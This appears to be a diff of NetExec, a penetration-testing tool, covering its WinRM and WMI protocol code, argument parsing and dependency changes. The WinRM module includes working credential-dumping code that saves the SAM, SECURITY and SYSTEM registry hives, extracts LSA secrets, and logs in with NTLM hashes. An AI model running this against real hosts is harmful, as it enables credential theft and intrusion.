self.logger.debug(f"Requesting URL: {endpoints[protocol]['url']}")
|
||||
res = requests.post(endpoints[protocol]["url"], verify=False, timeout=self.args.http_timeout)
|
||||
res = requests.post(endpoints[protocol]["url"], headers=headers, verify=False, timeout=self.args.http_timeout)
|
||||
self.logger.debug(f"Received response code: {res.status_code}")
|
||||
self.auth_type = res.headers["WWW-Authenticate"] if "WWW-Authenticate" in res.headers else "NOAUTH"
|
||||
self.challenge_header = res.headers["WWW-Authenticate"]
|
||||
if (not self.challenge_header) or ("Negotiate" not in self.challenge_header):
|
||||
self.logger.info('Failed to get NTLM challenge from target "/wsman" endpoint, maybe isn\'t winrm service.')
|
||||
return False
|
||||
self.endpoint = endpoints[protocol]["url"]
|
||||
self.ssl = endpoints[protocol]["ssl"]
|
||||
return True
|
||||
|
@ -233,7 +125,7 @@ class winrm(connection):
|
|||
else:
|
||||
self.logger.info(f"Other ConnectionError to WinRM service: {e}")
|
||||
return False
|
||||
|
||||
|
||||
def check_if_admin(self):
|
||||
wsman = self.conn.wsman
|
||||
wsen = NAMESPACES["wsen"]
|
||||
|
@ -246,12 +138,11 @@ class winrm(connection):
|
|||
wsman.enumerate("http://schemas.microsoft.com/wbem/wsman/1/windows/shell", enum_msg)
|
||||
self.admin_privs = True
|
||||
return True
|
||||
|
||||
|
||||
def plaintext_login(self, domain, username, password):
|
||||
self.admin_privs = False
|
||||
if not self.args.laps:
|
||||
self.password = password
|
||||
self.username = username
|
||||
self.password = password
|
||||
self.username = username
|
||||
self.domain = domain
|
||||
try:
|
||||
self.conn = Client(
|
||||
|
@ -290,15 +181,13 @@ class winrm(connection):
|
|||
self.admin_privs = False
|
||||
lmhash = "00000000000000000000000000000000"
|
||||
nthash = ""
|
||||
if not self.args.laps:
|
||||
self.username = username
|
||||
# This checks to see if we didn't provide the LM Hash
|
||||
if ntlm_hash.find(":") != -1:
|
||||
lmhash, nthash = ntlm_hash.split(":")
|
||||
else:
|
||||
nthash = ntlm_hash
|
||||
self.username = username
|
||||
# This checks to see if we didn't provide the LM Hash
|
||||
if ntlm_hash.find(":") != -1:
|
||||
lmhash, nthash = ntlm_hash.split(":")
|
||||
else:
|
||||
nthash = self.hash
|
||||
nthash = ntlm_hash
|
||||
|
||||
self.lmhash = lmhash
|
||||
self.nthash = nthash
|
||||
self.domain = domain
|
||||
|
@ -345,7 +234,7 @@ class winrm(connection):
|
|||
# Reference: https://github.com/diyan/pywinrm/issues/275
|
||||
if hasattr(e, "code") and e.code == 5:
|
||||
self.logger.fail(f"Execute command failed, current user: '{self.domain}\\{self.username}' has no 'Invoke' rights to execute command (shell type: {shell_type})")
|
||||
|
||||
|
||||
if shell_type == "cmd":
|
||||
self.logger.info("Cannot execute command via cmd, the user probably does not have invoke rights with Root WinRM listener - now switching to Powershell to attempt execution")
|
||||
self.execute(payload, get_output, shell_type="powershell")
|
||||
|
@ -371,7 +260,7 @@ class winrm(connection):
|
|||
def sam(self):
|
||||
sam_storename = gen_random_string(6)
|
||||
system_storename = gen_random_string(6)
|
||||
dump_command = f"reg save HKLM\SAM C:\\windows\\temp\\{sam_storename} && reg save HKLM\SYSTEM C:\\windows\\temp\\{system_storename}"
|
||||
dump_command = f"reg save HKLM\\SAM C:\\windows\\temp\\{sam_storename} && reg save HKLM\\SYSTEM C:\\windows\\temp\\{system_storename}"
|
||||
clean_command = f"del C:\\windows\\temp\\{sam_storename} && del C:\\windows\\temp\\{system_storename}"
|
||||
try:
|
||||
self.conn.execute_cmd(dump_command) if self.args.dump_method == "cmd" else self.conn.execute_ps(f"cmd /c '{dump_command}'")
|
||||
|
@ -400,7 +289,7 @@ class winrm(connection):
|
|||
def lsa(self):
|
||||
security_storename = gen_random_string(6)
|
||||
system_storename = gen_random_string(6)
|
||||
dump_command = f"reg save HKLM\SECURITY C:\\windows\\temp\\{security_storename} && reg save HKLM\SYSTEM C:\\windows\\temp\\{system_storename}"
|
||||
dump_command = f"reg save HKLM\\SECURITY C:\\windows\\temp\\{security_storename} && reg save HKLM\\SYSTEM C:\\windows\\temp\\{system_storename}"
|
||||
clean_command = f"del C:\\windows\\temp\\{security_storename} && del C:\\windows\\temp\\{system_storename}"
|
||||
try:
|
||||
self.conn.execute_cmd(dump_command) if self.args.dump_method == "cmd" else self.conn.execute_ps(f"cmd /c '{dump_command}'")
|
||||
|
@ -425,4 +314,4 @@ class winrm(connection):
|
|||
perSecretCallback=lambda secret_type, secret: self.logger.highlight(secret),
|
||||
)
|
||||
LSA.dumpCachedHashes()
|
||||
LSA.dumpSecrets()
|
||||
LSA.dumpSecrets()
|
||||
|
|
|
@ -1,6 +1,3 @@
|
|||
from argparse import _StoreTrueAction
|
||||
|
||||
|
||||
def proto_args(parser, std_parser, module_parser):
|
||||
winrm_parser = parser.add_parser("winrm", help="own stuff using WINRM", parents=[std_parser, module_parser])
|
||||
winrm_parser.add_argument("-H", "--hash", metavar="HASH", dest="hash", nargs="+", default=[], help="NTLM hash(es) or file(s) containing NTLM hashes")
|
||||
|
@ -9,18 +6,15 @@ def proto_args(parser, std_parser, module_parser):
|
|||
winrm_parser.add_argument("--check-proto", nargs="+", default=["http", "https"], help="Choose what prorocol you want to check, default is %(default)s, format: 'http https'(with space separated) or 'single-protocol'")
|
||||
winrm_parser.add_argument("--laps", dest="laps", metavar="LAPS", type=str, help="LAPS authentification", nargs="?", const="administrator")
|
||||
winrm_parser.add_argument("--http-timeout", dest="http_timeout", type=int, default=10, help="HTTP timeout for WinRM connections")
|
||||
no_smb_arg = winrm_parser.add_argument("--no-smb", action=get_conditional_action(_StoreTrueAction), make_required=[], help="No smb connection")
|
||||
|
||||
dgroup = winrm_parser.add_mutually_exclusive_group()
|
||||
domain_arg = dgroup.add_argument("-d", metavar="DOMAIN", dest="domain", type=str, default=None, help="domain to authenticate to")
|
||||
dgroup.add_argument("-d", metavar="DOMAIN", dest="domain", type=str, default=None, help="domain to authenticate to")
|
||||
dgroup.add_argument("--local-auth", action="store_true", help="authenticate locally to each target")
|
||||
no_smb_arg.make_required = [domain_arg]
|
||||
|
||||
cgroup = winrm_parser.add_argument_group("Credential Gathering", "Options for gathering credentials")
|
||||
cgroup.add_argument("--dump-method", action="store", default="cmd", choices={"cmd", "powershell"}, help="Select shell type in hashes dump")
|
||||
cegroup = cgroup.add_mutually_exclusive_group()
|
||||
cegroup.add_argument("--sam", action="store_true", help="dump SAM hashes from target systems")
|
||||
cegroup.add_argument("--lsa", action="store_true", help="dump LSA secrets from target systems")
|
||||
cgroup.add_argument("--sam", action="store_true", help="dump SAM hashes from target systems")
|
||||
cgroup.add_argument("--lsa", action="store_true", help="dump LSA secrets from target systems")
|
||||
|
||||
cgroup = winrm_parser.add_argument_group("Command Execution", "Options for executing commands")
|
||||
cgroup.add_argument("--codec", default="utf-8", help="Set encoding used (codec) from the target's output (default: utf-8). If errors are detected, run chcp.com at the target & map the result with https://docs.python.org/3/library/codecs.html#standard-encodings and then execute again with --codec and the corresponding codec")
|
||||
|
@ -29,18 +23,3 @@ def proto_args(parser, std_parser, module_parser):
|
|||
cgroup.add_argument("-X", metavar="PS_COMMAND", dest="ps_execute", help="execute the specified PowerShell command")
|
||||
|
||||
return parser
|
||||
|
||||
|
||||
def get_conditional_action(baseAction):
|
||||
class ConditionalAction(baseAction):
|
||||
def __init__(self, option_strings, dest, **kwargs):
|
||||
x = kwargs.pop("make_required", [])
|
||||
super().__init__(option_strings, dest, **kwargs)
|
||||
self.make_required = x
|
||||
|
||||
def __call__(self, parser, namespace, values, option_string=None):
|
||||
for x in self.make_required:
|
||||
x.required = True
|
||||
super().__call__(parser, namespace, values, option_string)
|
||||
|
||||
return ConditionalAction
|
|
@ -1,10 +1,10 @@
|
|||
import os
|
||||
import struct
|
||||
import logging
|
||||
|
||||
from io import StringIO
|
||||
from six import indexbytes
|
||||
from datetime import datetime
|
||||
|
||||
from nxc.helpers.ntlm_parser import parse_challenge
|
||||
from nxc.config import process_secret
|
||||
from nxc.connection import connection, dcom_FirewallChecker, requires_admin
|
||||
from nxc.logger import NXCAdapter
|
||||
|
@ -18,7 +18,6 @@ from impacket.dcerpc.v5 import transport, epm
|
|||
from impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_LEVEL_PKT_PRIVACY, RPC_C_AUTHN_WINNT, RPC_C_AUTHN_GSS_NEGOTIATE, RPC_C_AUTHN_LEVEL_PKT_INTEGRITY, MSRPC_BIND, MSRPCBind, CtxItem, MSRPCHeader, SEC_TRAILER, MSRPCBindAck
|
||||
from impacket.dcerpc.v5.dcomrt import DCOMConnection
|
||||
from impacket.dcerpc.v5.dcom.wmi import CLSID_WbemLevel1Login, IID_IWbemLevel1Login, IWbemLevel1Login
|
||||
import contextlib
|
||||
|
||||
MSRPC_UUID_PORTMAP = uuidtup_to_bin(("E1AF8308-5D1F-11C9-91A4-08002B14A0FA", "3.0"))
|
||||
|
||||
|
@ -86,7 +85,6 @@ class wmi(connection):
|
|||
def enum_host_info(self):
|
||||
# All code pick from DumpNTLNInfo.py
|
||||
# https://github.com/fortra/impacket/blob/master/examples/DumpNTLMInfo.py
|
||||
ntlmChallenge = None
|
||||
|
||||
bind = MSRPCBind()
|
||||
item = CtxItem()
|
||||
|
@ -123,39 +121,19 @@ class wmi(connection):
|
|||
if buffer != 0:
|
||||
response = MSRPCHeader(buffer)
|
||||
bindResp = MSRPCBindAck(response.getData())
|
||||
|
||||
ntlmChallenge = ntlm.NTLMAuthChallenge(bindResp["auth_data"])
|
||||
|
||||
if ntlmChallenge["TargetInfoFields_len"] > 0:
|
||||
av_pairs = ntlm.AV_PAIRS(ntlmChallenge["TargetInfoFields"][: ntlmChallenge["TargetInfoFields_len"]])
|
||||
if av_pairs[ntlm.NTLMSSP_AV_HOSTNAME][1] is not None:
|
||||
try:
|
||||
self.hostname = av_pairs[ntlm.NTLMSSP_AV_HOSTNAME][1].decode("utf-16le")
|
||||
except Exception:
|
||||
self.hostname = self.host
|
||||
if av_pairs[ntlm.NTLMSSP_AV_DNS_DOMAINNAME][1] is not None:
|
||||
try:
|
||||
self.domain = av_pairs[ntlm.NTLMSSP_AV_DNS_DOMAINNAME][1].decode("utf-16le")
|
||||
except Exception:
|
||||
self.domain = self.args.domain
|
||||
if av_pairs[ntlm.NTLMSSP_AV_DNS_HOSTNAME][1] is not None:
|
||||
with contextlib.suppress(Exception):
|
||||
self.fqdn = av_pairs[ntlm.NTLMSSP_AV_DNS_HOSTNAME][1].decode("utf-16le")
|
||||
if "Version" in ntlmChallenge.fields:
|
||||
version = ntlmChallenge["Version"]
|
||||
if len(version) >= 4:
|
||||
self.server_os = "Windows NT %d.%d Build %d" % (indexbytes(version, 0), indexbytes(version, 1), struct.unpack("<H", version[2:4])[0])
|
||||
ntlm_info = parse_challenge(bindResp["auth_data"])
|
||||
self.domain = ntlm_info["domain"]
|
||||
self.hostname = ntlm_info["hostname"]
|
||||
self.server_os = ntlm_info["os_version"]
|
||||
self.logger.extra["hostname"] = self.hostname
|
||||
else:
|
||||
self.hostname = self.host
|
||||
|
||||
if self.args.local_auth:
|
||||
self.domain = self.hostname
|
||||
if self.args.domain:
|
||||
self.domain = self.args.domain
|
||||
self.fqdn = f"{self.hostname}.{self.domain}"
|
||||
|
||||
self.logger.extra["hostname"] = self.hostname
|
||||
|
||||
self.output_filename = os.path.expanduser(f"~/.nxc/logs/{self.hostname}_{self.host}_{datetime.now().strftime('%Y-%m-%d_%H%M%S')}".replace(":", "-"))
|
||||
|
||||
def print_host_info(self):
|
||||
|
|
File diff suppressed because it is too large
Load Diff
|
@ -33,13 +33,13 @@ NetExec = 'nxc.netexec:main'
|
|||
nxcdb = 'nxc.nxcdb:main'
|
||||
|
||||
[tool.poetry.dependencies]
|
||||
python = "^3.7.0"
|
||||
python = "^3.8.0"
|
||||
requests = ">=2.27.1"
|
||||
beautifulsoup4 = ">=4.11,<5"
|
||||
lsassy = ">=3.1.8"
|
||||
termcolor = "2.0.1"
|
||||
msgpack = "^1.0.0"
|
||||
neo4j = "^4.1.1" # do not upgrade this until performance regression issues in 5 are fixed (as of 9/23)
|
||||
neo4j = "^5.0.0"
|
||||
pylnk3 = "^0.4.2"
|
||||
pypsrp = "^0.8.1"
|
||||
paramiko = "^3.3.1"
|
||||
|
@ -61,15 +61,14 @@ aiosqlite = "^0.19.0"
|
|||
pyasn1-modules = "^0.3.0"
|
||||
rich = "^13.3.5"
|
||||
python-libnmap = "^0.7.3"
|
||||
resource = "^0.2.1"
|
||||
oscrypto = { git = "https://github.com/Pennyw0rth/oscrypto" } # Pypi version currently broken, see: https://github.com/wbond/oscrypto/issues/78 (as of 9/23)
|
||||
pyreadline = "^2.1" # for the build - impacket imports its hidden from the builder so an error occurs
|
||||
ruff = "=0.0.292"
|
||||
argcomplete = "^3.1.4"
|
||||
|
||||
[tool.poetry.group.dev.dependencies]
|
||||
flake8 = "*"
|
||||
shiv = "*"
|
||||
pytest = "^7.2.2"
|
||||
ruff = "=0.0.292"
|
||||
|
||||
[build-system]
|
||||
requires = ["poetry-core>=1.2.0"]
|
||||
|
@ -123,4 +122,4 @@ target-version = "py37"
|
|||
[tool.ruff.flake8-quotes]
|
||||
docstring-quotes = "double"
|
||||
inline-quotes = "double"
|
||||
multiline-quotes = "double"
|
||||
multiline-quotes = "double"
|
||||
|
|
|
@ -7,13 +7,13 @@ from nxc.nxcdb import delete_workspace, NXCDBMenu
|
|||
from nxc.first_run import first_run_setup
|
||||
from nxc.loaders.protocolloader import ProtocolLoader
|
||||
from nxc.logger import NXCAdapter
|
||||
from nxc.paths import WS_PATH
|
||||
from nxc.paths import WORKSPACE_DIR
|
||||
from sqlalchemy.dialects.sqlite import Insert
|
||||
|
||||
|
||||
@pytest.fixture(scope="session")
|
||||
def db_engine():
|
||||
db_path = os.path.join(WS_PATH, "test/smb.db")
|
||||
db_path = os.path.join(WORKSPACE_DIR, "test/smb.db")
|
||||
db_engine = create_engine(f"sqlite:///{db_path}", isolation_level="AUTOCOMMIT", future=True)
|
||||
yield db_engine
|
||||
db_engine.dispose()
|
||||
|
|
Loading…
Reference in New Issue